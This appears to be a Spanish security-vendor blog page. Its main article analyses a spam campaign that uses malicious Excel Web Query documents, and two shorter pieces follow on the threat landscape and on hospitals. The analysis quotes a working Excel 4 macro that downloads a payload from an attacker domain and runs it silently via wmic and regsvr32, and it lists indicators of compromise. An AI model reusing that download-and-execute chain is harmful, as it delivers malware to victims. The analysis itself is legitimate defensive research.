Campaña misteriosa de spam: análisis de seguridad

Campaña misteriosa de spam: análisis de seguridad

Aunque el mal uso de Excel Web Query (IQY) para la propagación de malware no es nada nuevo [1], un caso reciente ha desconcertado no sólo a los investigadores del Security Lab de Hornetsecurity, sino también a otros analistas de seguridad [3][6]. Una campaña de spam de correo electrónico en la que se entregan documentos de Excel malignos en archivos comprimidos. Una vez realizado el análisis en los ordenadores por los expertos en ciberseguridad, la aplicación de la calculadora de Windows se inicia automáticamente. Los analistas suponen que los atacantes pueden estar tratando de desviar la atención de la intención real del documento malicioso que se entregó a las víctimas. En este informe, el Security Lab de Hornetsecurity,  llega al fondo del caso.

El procedimiento

Los documentos maliciosos se distribuyen como archivos adjuntos zip llamados invoice*.xls.zip, siendo la parte * la única variable. El mensaje de correo electrónico adjunto es muy breve, a veces sin y otras con saludo, pero siempre con una referencia al archivo adjunto sin ningún texto adicional:

Email Example Malware Scam

Tan pronto como se abre el documento, aparece un pop up con un falso mensaje de diálogo que dice: «Encontramos un problema con el contenido. ¿Quiere intentar recuperar lo máximo posible?»:

Email Example Office Excel Scam

Luego el documento utiliza Excel Web Query para descargar código de macro adicional desde una ubicación remota. Uno de esos códigos de macros observados descargó y ejecutó un archivo ejecutable (identificado como w32-dll-run-shellcode.dll), que a su vez ejecutó la aplicación de calculadora de Windows calc.exe.

El Security Lab de Hornetsecurity asume que este no era o es el objetivo previsto. Sin embargo, la investigación de la OSINT y la correlación con otras fuentes indican que el único programa recargado era w32-dll-run-shellcode.dll. No se sabe si en algún otro momento se entregó un archivo recargado malicioso en lugar del w32-dll-run-shellcode.dll. Tampoco se sabe si w32-dll-run-shellcode.dll fue/está entregado intencionalmente o por error.

Análisis técnico

El documento

El documento tiene una hoja oculta:

Hidden Sheet Example

En esta tabla oculta en las celdas, el código macro para el pop up engañoso descrito anteriormente puede verse:

Inside Hidden Sheet Malwarescam

Cuando se ejecuta el documento sin Internet, se muestra un error con la URL maliciosa que debería haberse cargado:

Unable to Open URL Malwarescam

Si el documento se ejecuta en Internet emulada y la consulta recibe una respuesta genérica, se informa de un error de consulta en la Web:

Web Query Error MalwareScam

Sabiendo esto, las conexiones de datos de la carpeta pueden ser examinadas para revelar la cadena de conexión de la consulta Web:

Web Query Connection String MalwareScam

Desafortunadamente, el Archivo de Consulta Web de Excel (IQY) no pudo ser cargado y las conexiones HTTP fueron redirigidas a https://www.google.com/ usando un código 301. Es una técnica conocida para negar a los investigadores de seguridad informática el acceso al objetivo. Esto podría basarse en rangos de direcciones IP o en el llamado geofencing, de modo que sólo las redes de víctimas previstas tengan acceso al objetivo verdadero, o la URL sólo podría permitir un cierto número de descargas del objetivo antes de la redirección.

Se sabe por otras fuentes que se devolvió una solicitud de consulta web de Excel:

Source Code MalwareScam
Mientras que los comandos =CLOSE(FALSE) le indican a Excel que cierre la tabla, hemos examinado más a fondo la base URL /lander/excel4_158158672/index.html. Sin embargo, también fue redirigido a https://www.google.com/.
  Finalmente, /lander/excel4 devuelve el siguiente macro de Excel 4:
=CALL(«urlmon»,»URLDownloadToFileA»,»JJCCJJ»,0,»https://merystol.xyz/SDVsdv23r»,»c:\\Users\\Public\\fbafb4234.html»,0,0)
=IF(ALERT(«The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.»,2), WAIT(NOW()+»00:00:01″), )
=EXEC(«wmic process call create «»regsvr32 -s c:\\Users\\Public\\fbafb4234.html»»»)
=CLOSE(FALSE)

Esta macro descarga un archivo de https://merystol.xyz/SDVsdv23r a c:\\\usuario\\publico\\fbafb4234.html via urlmon.URLDownloadToFileA. Entonces regsvr32 a través de la llamada de proceso wmic creada para registrar sigilosamente (-s switch) el DLL descargado.

Y aquí es donde el caso se vuelve extraño: mientras que la anterior URL https://merystol.xyz/SDVsdv23r fue redirigida a https://www.google.com/ durante nuestro análisis, en VirusTotal se puede ver que en un momento dado la URL cargó un archivo con el hash 85697bfc0e89c5499a46aeec656b3b9facd8b9fe7174b3db9b2b9f7dbcbaaedb lud [2].

MalwareScam VirusTotal Screenshot

El w32-dll-run-shellcode.dll es muy simple, no contiene importaciones y apenas tiene una secuencia de caracteres:

$ strings 85697bfc0e89c5499a46aeec656b3b9facd8b9fe7174b3db9b2b9f7dbcbaaedb.bin
!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.reloc
RhcalcTYRQd
WinEu
w32-dll-run-shellcode.dll
_DllMain@12

El Githubtribution a través de la cadena w32-dll-run-shellcode.dll conduce a https://github.com/CryptXor/win-exec-calc-shellcode/blob/master/build_config.py (un clon del proyecto original en https://code.google.com/archive/p/win-exec-calc-shellcode/). El código en cuestión es idéntico a https://github.com/CryptXor/win-exec-calc-shellcode/blob/master/w32-exec-calc-shellcode.asm. Es un viejo código PoC de un agresivo investigador de seguridad que ejecuta calc.exe.

La descarga de este w32-dll-run-shellcode.dll también fue observada por otros investigadores [3].

El mismo w32-dll-run-shellcode.dll también estaba disponible en https://brinchik.xyz/Qz8ZNnxg [4]. Un esquema de nombres de dominio y URL que coincide con el malware observado aquí. La misma URL se redirige a una URL descargando Ursnif. Esto fue previamente verificado por otro investigador [5]. Esto significa que es probable que la ejecución de calc.exe sea un movimiento calculado por los atacantes para distraer del análisis el objetivo real. No se puede determinar en este momento si esta campaña está relacionada con Ursnif y quién está detrás de ella.

Entrega

 

 

Los correos electrónicos se envían desde cuentas de correo real aol.com (89%) y wp.pl (11%). Por lo tanto, los correos electrónicos de aol.com también pasan la validación de la DMARC. No pudimos observar ninguna reutilización de las direcciones de correo electrónico, es decir, la entrega se programó definitivamente para asegurar que se utilizara un único correo electrónico del remitente para cada envío. Sin embargo, los hackers no se dirigieron a ningún sector o industria específica.

Los correos electrónicos fueron entregados el 14.02.2020, 19.02.2020, 20.02.2020 y 21.02.2020:

Email Delivery History

Los nombres de los remitentes siguen el patrón firstname.lastname[0-9a-z]{0,5}@(aol.com|wp.pl).

El bajo volumen de correo electrónico también podría indicar que se trata de una primera prueba o demostración de un nuevo tipo de documento malicioso que utiliza consultas web de Excel.

Conclusión y recomendaciones

 

Esta campaña utiliza macros de Excel 4 y consultas web de Excel para ejecutar y desplegar un malware de segunda fase, aún desconocido. Esto probablemente permite eludir algunos mecanismos de defensa que sólo buscan macros VBA. Todavía se desconoce exactamente qué carga útil se entrega y si la entrega del malware de la 2ª etapa, que simplemente abre la aplicación informática, está diseñada como una solución de análisis o como un error. Sin embargo, el tiempo empleado en el envío del correo electrónico y las redirecciones a Google a través de la URL del objetivo indica que se trata de un desvío calculado.

    Los usuarios pueden protegerse de este tipo de documentos maliciosos de la siguiente manera:
  • Desactivando macros y contenido remoto en Office.
  • No habilitando la funcionalidad de edición o de macro, aunque lo indique un documento.
Hornetsecurity ya está bloqueando este tipo de campaña maliciosa y el Security Lab sigue vigilando la situación.

Indicadores de Compromiso (IOCs)

Hashes
SHA256Description
018902c1bbfe41581710c5efad2a2c9f516bd7aa98dc8432584520623e7eb2bcDocument
6dcc25eb214c38bc942ffdbe8680a1dec867ac4780aac7262391298d561b5928Document
822054123910494bbb80cc4e46f79f045cc527dc12d89bda4b8b58bd9be417f7Document
dc778302fefac2735c112311736e2050eef7a2b84b1e1569b0456e8349d0715cDocument
e1bf01178976efeedcd277f83bebc02f8f4d687d7348d906950a0a524f3f1a98Document

DNSs

  • doolised.xyz
  • emmnebuc.xyz
  • merystol.xyz
  • veqejzkb.xyz

MITRE ATT&CK técnicas

 

TácticaIDNombreDescripción
Acceso InicialT1193Spearphishing AttachmentManda email para obtener acceso inicial.
EjecuciónT1204User ExecutionLa víctima ejecuta la carga.
EjecuciónT1047Windows Management InstrumentationWMI se usó para ejecutar la carga de la segunda etapa de la carga útil.
Defensa EvasiónT1117Regsvr32Ejecución del proxy de la carga útil de la segunda etapa.

 

 

 

Ciberdelincuencia: la amenaza cada vez mayor

Ciberdelincuencia: la amenaza cada vez mayor

La integración de la tecnología en casi todos los componentes de la vida humana no sólo abre nuevas posibilidades, sino que también ofrece innumerables puertas de entrada, aún no claramente definidas, para las actividades delictivas. Se están introduciendo nuevas tecnologías – más rápido de lo que se puede comprobar y garantizar la seguridad de estas. El ciberespacio está cambiando rápidamente, así como los métodos utilizados por los hackers y los estafadores.
¿Por qué el cibercrimen es una de las amenazas globales? , ¿qué papel jugará la inteligencia artificial en los futuros ciberataques y su defensa?, y ¿por qué los hackers se dirigen cada vez más a Microsoft Office 365?, es el tema del último Hornetsecurity Cyberthreat Report 2020. Además, las estadísticas actuales y las evaluaciones exclusivas de los expertos del Security Lab de Hornetsecurity proporcionan una visión detallada del panorama de amenazas del mundo cibernético.

Una amenaza global

¿Qué tienen en común las sequías, los maremotos, las crisis de agua potable y la ciberdelincuencia? Todas ellas se encuentran entre las amenazas globales que ponen en peligro nuestra vida cotidiana. La ciberdelincuencia se encuentra ahora en su tercer año consecutivo, ya que el aumento de los ciberataques profesionales y dirigidos ha revelado una creciente amenaza potencial para la seguridad nacional y mundial. En particular, el colapso de las infraestructuras críticas causado por los ciberataques ocupa actualmente el segundo lugar entre los riesgos para nuestro planeta. La seguridad de las infraestructuras de TI es cada vez más importante en la mente de las personas y las empresas: el 92 por ciento de los encuestados en un estudio de TÜV considera que los ciberataques son una amenaza grave. Y con razón. Además de los daños de imagen, las pérdidas monetarias también juegan un papel importante.

Infraestructuras críticas: cuando la electricidad ya no fluye

Las infraestructuras críticas están cada vez más expuestas a los ciberataques. El BSI (Bundesamt für Sicherheit in der Informationstechnik) u (Oficina Federal Alemana de Seguridad de la Información) ha notado un aumento constante de los ataques en los últimos años. Según un análisis de los expertos del Security Lab de Hornetsecurity, el sector de la energía ha sido el más atacado desde principios de 2019, pero ¿de dónde viene esta tendencia? Un ataque cibernético a una empresa de servicios públicos ejerce una gran presión sobre los operadores, porque las consecuencias son devastadoras. Un corte prolongado de energía, por ejemplo, no sólo provoca cuellos de botella en el suministro de alimentos, sino que además los medicamentos ya no se pueden enfriar. Por lo tanto, la ciberseguridad de las infraestructuras críticas merece una atención especial.

Sectores en peligro de extinción

Los expertos en TI del Security Lab de Hornetsecurity han llegado a una interesante conclusión: Luego de un análisis de los 1000 dominios más importantes con el mayor volumen de correo electrónico, el sector energético en particular, pero también el sector logístico y de automoción están en peligro de sufrir ciberataques. Los vectores de ataque utilizados por los ciberdelincuentes son sorprendentes. Por ejemplo, el Security Lab de Hornetsecurity ha descubierto que los ciberataques al sector energético utilizan enlaces especialmente maliciosos, ya que muchas soluciones antispam pueden detectar los virus incluso en los archivos adjuntos. Los ciberdelincuentes están utilizando nuevos métodos para propagar el malware y eludir las antiguas funciones de seguridad.

Ransomware & Emotet

En octubre de 2019, el FBI advirtió de una ola de ataques con rescates. La última vez que hubo un informe de este tipo fue en 2016, poco antes de WannaCry y NotPetya. Un ataque exitoso con software de rescate puede conducir a fallos completos de redes enteras y, por lo tanto, no sólo causa considerables interrupciones en las operaciones sino también inmensas pérdidas monetarias. Ransomware ya no es un simple troyano, sino que se está convirtiendo cada vez más en un modelo de negocio.
¿Cuál es el malware más peligroso del mundo? Emotet. ¿Por qué? Desde su primer lanzamiento en 2014, Emotet ha estado en constante evolución. Ahora el malware no sólo lee las relaciones de contacto del historial, sino también el contenido de los correos electrónicos. Esto proporciona a los ciberdelincuentes una base para ataques de ingeniería social dirigidos.

Microsoft Office 365: el hijo favorito del hacker

La externalización de infraestructuras de TI es cada vez más popular, especialmente entre las empresas y organizaciones. Es probable que en el futuro una gran proporción del tráfico de datos sea transportado a través de la nube. Office 365 Cloud de Microsoft es uno de los servicios más populares de este tipo, con un aumento del 320 por ciento en el número de suscriptores entre 2015 y 2017.
Pero ¿por qué es tan vulnerable la Nube de Microsoft Office? Alrededor de 100 millones de clientes empresariales utilizan el Microsoft Office 365 Suite: en él se intercambian y almacenan datos confidenciales, secretos de empresa e información personal. Pero el alto número de usuarios también atrae a los ciberdelincuentes. Ya en 2018, por ejemplo, se identificó un aumento considerable de los ataques. Según Recorded Future, Microsoft se situó en ocho lugares de la lista de las diez vulnerabilidades más explotadas, seis de ellas en aplicaciones de Office.

¿Qué es lo siguiente que nos espera?

Una cosa está clara: la amenaza de los ciberdelincuentes es cada vez mayor, tanto para los individuos como para las empresas. El nuevo Cyberthreat Report de Hornetsecurity ofrece una visión detallada de la situación actual de las amenazas, muestra estadísticas sobre spam y phishing y proporciona muchas más evaluaciones exclusivas de los expertos en seguridad informática del Sec Lab de Hornetsecurity. ¡Solicita el informe ahora mismo de forma gratuita!
Ciberataque de diagnóstico: los hospitales, el blanco de los hackers

Ciberataque de diagnóstico: los hospitales, el blanco de los hackers

Cuando el ordenador del hospital se convierte en el blanco de los ciberdelincuentes, hay vidas humanas en juego. El sector sanitario se está digitalizando cada vez más: los datos de los pacientes ya no se almacenan en archivos de papel, sino en ordenadores. Los datos de los marcapasos y las bombas de insulina se transfiere a los smartphones a través del wifi. Muchos dispositivos médicos están conectados a Internet. El creciente trabajo en red está creando cada vez más puntos de entrada para los ciberataques, que pueden tener consecuencias fatales. Por ejemplo, si las enfermeras y los médicos ya no pueden acceder a los datos de los pacientes debido a un fallo de la tecnología de la información, es posible que se administren medicamentos de forma incorrecta. ¿Qué dosis y de qué medicamento recibe el paciente “X” y a qué hora? Una sobredosis puede ser potencialmente mortal, especialmente con medicamentos para el corazón o la diabetes. Y también existe un peligro inmenso en el quirófano: incluso una manipulación mínima de un dispositivo médico durante una operación en el corazón o el cerebro de un paciente puede conducir no sólo a un daño irreversible, sino también a la muerte.

 

Máquinas conectadas en red: ¿un peligro?

En el sector médico, la digitalización y la creación de redes desempeñan un papel cada vez más importante, ya sea en el quirófano, en el laboratorio o en la atención de enfermería. El robot médico DaVinci, por ejemplo, ya se está utilizando en muchas clínicas estadounidenses y hospitales alemanes para la cirugía mínimamente invasiva. El cirujano controla los instrumentos desde un panel de control, los brazos robóticos de DaVinci implementan los movimientos de la mano.

Robots que apoyan a las personas en el laboratorio en el manejo de sustancias potencialmente peligrosas y nanorobots que nadan a través de los vasos sanguíneos y llevan las sustancias farmacéuticas al punto del cuerpo donde se necesitan. El futuro de la tecnología médica es prometedor, pero está expuesto a un peligro constante porque todo sistema de TI puede ser atacado si la seguridad es inadecuada y representa un objetivo potencial para los ciberdelincuentes.

En 2015, los investigadores de seguridad encontraron casi 70.000 dispositivos médicos con brechas de seguridad, incluyendo medicina nuclear, dispositivos de infusión, equipos de anestesia y dispositivos para procedimientos de imagenología. Las lagunas en el equipo médico no pasaron desapercibidas entre los ciberdelincuentes. En julio de este año, la Cruz Roja Alemana en Sarre y Renania-Palatinado fue víctima de un ataque de rescate. El software chantajista encriptó bases de datos y servidores y paralizó toda la red del hospital DRK. Por razones de seguridad, los servidores fueron eliminados de la red. Sin embargo, la atención de los pacientes estaba garantizada en todo momento, los ingresos de los pacientes y los hallazgos médicos se realizaron inicialmente con lápiz y papel. Después de unos días, los servidores del DRK volvieron a ponerse en funcionamiento. Los datos se pueden restaurar desde una copia de seguridad.

Al año siguiente, una clínica en Neuss fue atacada por hackers. Un empleado abrió el archivo adjunto infectado de un correo electrónico malicioso y descargó un troyano de chantaje en el sistema informático interno, que se extendió a todos los ordenadores del hospital. En muy poco tiempo, los empleados del hospital altamente digitalizado de Neuss tuvieron que volver al método de documentación análogo.

 

Principales deficiencias de seguridad en los centros de salud

 

Las medidas de seguridad en los hospitales y otros centros de salud son menos maduras que en las grandes empresas. La vida diaria en el hospital es agitada, los ordenadores no están cerrados cuando se sale del lugar de trabajo, apenas hay tiempo para actualizaciones de software. Los dispositivos y sistemas obsoletos están conectados en red entre sí y conectados a Internet; en muchos lugares surgen lagunas de seguridad. El ataque en Neuss muestra que la puerta de entrada principal a los ciberataques es principalmente el correo electrónico. La falta de conciencia por parte de los empleados da a los ataques con archivos adjuntos maliciosos en los correos electrónicos la oportunidad de encriptar, copiar o robar datos. Los hackers exigen un rescate por descifrar, generalmente en forma de monedas criptográficas como Bitcoins. En el hospital de Neuss, los datos pudieron ser restaurados gracias a una copia de seguridad y no fue necesario pagar ningún rescate, pero los sistemas tuvieron que ser apagados. A pesar del respaldo, el ciberataque le costó al hospital alrededor de un millón de euros.

 

¿Cómo pueden protegerse los hospitales?

 

Los ciberataques ya no son sólo un problema para las grandes corporaciones de la industria, sino que pertenecen a las mayores amenazas del mundo, según el Informe de Riesgo Global 2019 del Foro Económico Mundial. En vista de los peligros globales de los ciberataques, especialmente los ataques a hospitales y otras infraestructuras críticas, existe una gran necesidad de actuar para proteger los sistemas de TI.

El problema: los ciberdelincuentes están utilizando cada vez más enfoques pérfidos para introducir de contrabando malware y otros programas dañinos. Un simple programa antivirus ya no es suficiente para proteger toda la TI de la empresa. Los sistemas de filtrado en profundidad con sofisticados mecanismos de detección, con los que se pueden detectar los correos electrónicos maliciosos en una fase temprana, constituyen la base para una protección completa.

Para reducir el índice de éxito de los ataques de ingeniería social, como el fraude del CEO o la suplantación de identidad, el personal del hospital necesita aprender más sobre las características del correo electrónico malicioso a través de la formación en seguridad de TI, lo que reduce el riesgo de que un empleado propaga malware y cause daños posteriores.

Pero los medios financieros para asegurar los sistemas de TI son limitados. Y la situación legal actual también dificulta la seguridad de los dispositivos médicos para los hospitales, ya que una vez que han sido certificados, ya no se pueden cambiar, ni siquiera con actualizaciones de software. En última instancia, la digitalización ofrece más vectores de ataque para los ciberdelincuentes si no se tienen en cuenta las lagunas de seguridad. Aunque no ha habido un ciberataque selectivo en un hospital que haya dañado a un paciente, se deben tomar las precauciones adecuadas y efectivas para evitarlo. La seguridad de la infraestructura de TI en los hospitales debe recibir mayor prioridad, ya que, en última instancia, cualquier ataque cibernético a un centro sanitario puede tener consecuencias no sólo económicas, sino también sanitarias.